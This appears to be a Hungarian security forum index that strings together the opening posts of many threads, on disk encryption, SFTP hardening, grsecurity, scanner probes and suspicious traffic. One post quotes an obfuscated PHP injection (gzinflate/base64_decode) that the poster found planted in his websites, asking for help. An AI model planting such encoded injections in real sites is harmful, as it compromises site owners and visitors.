Üdv mindenkinek!

Olyan megoldást keresek amelynek segítségével egy terminál be tud boot-olni felhasználói közreműködés nélkül, úgy hogy az adattárolói titkosítva vannak. Az alaplapon van tpm modul csatlakozási lehetőség, illetve usb,soros portos saját hardvert is tudok csinálni a cél érdekében.
Az lenne jó ha van rá lehetőség, hogy a grub a tpm modulból vett kulccsal decrypteli az adathordozót és akkor felbootol, vagy a grub soros-usb porton valami ugrókódos megoldással kapja meg a kulcsot.
De ha van már kész megoldás az lenne a legjobb.

Sziasztok!

A napokban érdekes dolgok jelentek meg néhány weboldalam(szerencsére csak hobbi célú lapok) kódjaiban, konkrétan ez:


#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#


Sziasztok!

használja valaki? Mi a véleményetek róla elsősorban biztonsági szempontból?

köszi
G

Sziasztok!
A napokban azt vettük észre, hogy az egyik szerverünk külső hálókártyája random időközönként iszonyatos forgalommal árasztja el a hálózatot.
Először azt gondoltuk, hogy a hálókártya ment tönkre. Kicseréltem, de tegnap délután úőjra előjött a jelenség.
Szerencsére iptraffal sikerült kimonitorozni, és ott a következőt láttam: "Outgoing rates: 7500 kbit/sec", és az iptraf annyit írt, hogy az 50.115.40.202-es címre mennek tőlem udp csomagok! Ha jól fejtettem vissza, akkor ez valami kaliforniai ip...

Sziasztok,
Érdeklődnék tud-e valaki ingyenes, kész és elérhető megoldást ftp szervernek a címben szereplő megoldással való védelmére.
Jelszó lopó programok elleni védelemre gondolok első sorban. Több hosztinggal foglalkozó szolgáltatónál van már működő rendszer (tudtommal ezek saját fejlesztésűek).
Pl. egy weboldalon felhsználónév+jelszó+captcha trió után x ideig engedi az ftp csatlakozást a juzernek vagy az ip-nek.
Van-e ilyen vagy valami hasonló dolog ?
Álljak neki sajátot fejleszteni (nem vagyok programozó, nehéz lesz :-( )

Sziasztok!

[Szerk:]
Úgy tűnik, a Quake motorban Egy feltörekvő ET modifikáció-ban (N!tmod) bug van, így DDOS-ol a szerverünk. (Érinti valamennyi erre épülő játékszervert.) (Az általunk használt mod fejlesztőjének jeleztem a hibát.)
Azt szeretném megtudni, hogy a tipikus szerver-kliens közti kommunikációt hogyan tudnám "portok" közé szorítani. Íme egy minta:

IP szervercímem.eu.27970 > kliensipje.27960: UDP, length 61
IP kliensipje.27960 > szervercímem.eu.27970: UDP, length 50

Mit tennetek ha egy olyan SFTP szervert kene hardenelnetek ahol a userek fel- es letoltenek es semmi masra nincs szukseg?

Nagyvonalakban:
- Umask 077
- Csak CTR cipherek engedelyezese (AES256 es Blowfish) a CBC cipherekben nem bizunk, akkor sem ha az OpenSSHban mindent megtettek a sebehezhetoseg kivedese erdekeben (http://www.mozilla.org/projects/security/pki/nss/news/vaudenay-cbc.html)
- Compression engedelyezve
- checkFile, versionSelect es posixRename SFTP extensionoket engedelyezzuk, copyFile es vendorID extensionokre deny
- Maximum 5 szimultan kapcsolat egy IProl

Az SG.hu cikke szerint a Pentagon és a Légierő közösen kifejlesztett egy biztonságos Linux telepítőkészletet. A rendszer a működése során nem ment háttértárra semmilyen adatot.
Bárki letöltheti innen: http://www.spi.dod.mil/lipose.htm

Tegyuk fel, hogy - mivel nem vagy elegedett a vendor altal szallitottal - sajat RPMet csinalsz az Apache httpdbol.

Kerdesek:
- Upstreambol vagy SRPMbol forditanal? Milyen szempontok alapjan?
- Milyen core modulokat raknal bele es miket nem? Miert?
- Az osszes modult egy nagy RPMben szallitanad vagy minden modult kulon RPMbe raknal? Miert?

Nyilvan megvan a sajat velemenyem is, de a tieteket is szeretnem hallani :)

Sziasztok!

Van egy szerverünk, ahol a userek szabadon adhatnak hozzá cron-okat, annyi megkötéssel, hogy csak PHP scripteket tudnak futtatni.
A kérdésem az lenne, hogy meg lehet-e oldani valahogy, hogy ezeket a folyamatokat bechroot-oljuk valahogy?

Előre is köszi minden segítséget!

Sziasztok,

Ti milyen eszközöket használtok Linuxos szerverek biztonsági tesztelésére? Külső és belső eszközök is érdekelnének. Esetleg olyanok is érdekelnek, amelyek a telepített webes appok biztonságát is megpróbálják ellenőrizni.

Köszi,
KAMI

Sziasztok,

néhány napja az egyik gépem elérhetetlenné vált. Bementem a szerverparkba, és átnéztem a gépet. Látszólag elfogyott a memória, és szépen kilőtte a rendszer a folyamatokat. Muninban látszott egy magas load (25 körül azt hiszem). Ezután nem lehetett a szervert semmilyen formában elérni. Csak a ping működött.

Feltettem a grsecet (High modra van allitva) a gondom az hogy elolvastam dokumentaciojat es keresgeltem is neten de nemnagyon ertem pontosan hogy mukodik a tanulas-ACL generalos dolog.

Alapbol a targyban emlitett shutdown al van gondom, nem jarhato nalam, hogy csak felhasznaloi beavatkozasra alljon le a rendszer mert korlatozott aksiju szunetmentesrol megy a cucc, szal ha kigyogy szufla szunetmentes soros porton leallitja gepet, csakhogy ha GRSEC enabled eppen akkor nemfogja tudni leallitani.

Sziasztok,

a w00tw00.at.* valamilyen botnet?
Milyen hatékony módszerekkel lehet védekezni a hasonló szimatolgatásokkal szemben?

Az apache access logjában a nevére szűrve ennyi látszik:

208.109.191.74 - - [31/Jan/2011:18:28:56 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 383 "-" "-"
77.70.54.66 - - [11/Feb/2011:14:13:34 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 383 "-" "-"
91.121.243.113 - - [11/Feb/2011:22:38:25 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 413 "-" "ZmEu"

Hulye cim, tudom :) Amugy a kovetkezo erdekel:
Adott egy konyvtar, alkonyvtarakkal, szabvanyos felepitessel, csak mondjuk a 3. szinten valtozik a nev.
pelda:
/var/www/domain1/
/var/www/domain2/
/var/www/domain3/

A fenti alatt mindegyik alkonyvtar szabvanyos, vagyis

/var/www/domain1/etc
/var/www/domain1/home
/var/www/domain1/log
/var/www/domain2/etc
/var/www/domain2/home
/var/www/domain2/log

Namost, logrotate tudja a kovetkezot:
/var/www/*/log/*
Es ilyenkor a /var/www/ alatti osszes alkonyvtar log konyvtaraban az osszes filet rotalja.

Sziasztok! Nemrég készítettem mentést egy Ubuntu 8.04.4 LTS rendszerről (a fontosabb könyvtárakat egy még évekkel ezelőtt készített szkripttel bepakoltam egy tar.gz-be), aztán leszedtem a gépemre, ahonnan archiválhatom. De gondoltam, előtte mégiscsak kicsomagolom, és átnézem, van-e benne olyan, amit felesleges menteni... Aztán kicsomagolás közben szólt az Avira, hogy rootkit rejtőzik a fájlok között:

Sziasztok!

A szerver logjait nézegetve a következő iptables logokat találtam benne; 13mp-es időközönként egy-egy 4 és fél órán keresztül:


Dec 9 21:14:29 ... SRC=222.73.227.230 ... LEN=40 TOS=0x00 PREC=0x00 TTL=254 ID=5745 PROTO=TCP SPT=29049 DPT=22 WINDOW=0 RES=0x00 RST URGP=0
...
Dec 10 01:42:04 ... SRC=222.73.227.230 ... LEN=40 TOS=0x00 PREC=0x00 TTL=254 ID=10841 PROTO=TCP SPT=39088 DPT=22 WINDOW=0 RES=0x00 RST URGP=0


A csomagokat az alábbi iptables szabályok dobják el (az INPUT láncon ezek előtt csak a loopback engedélyezése van)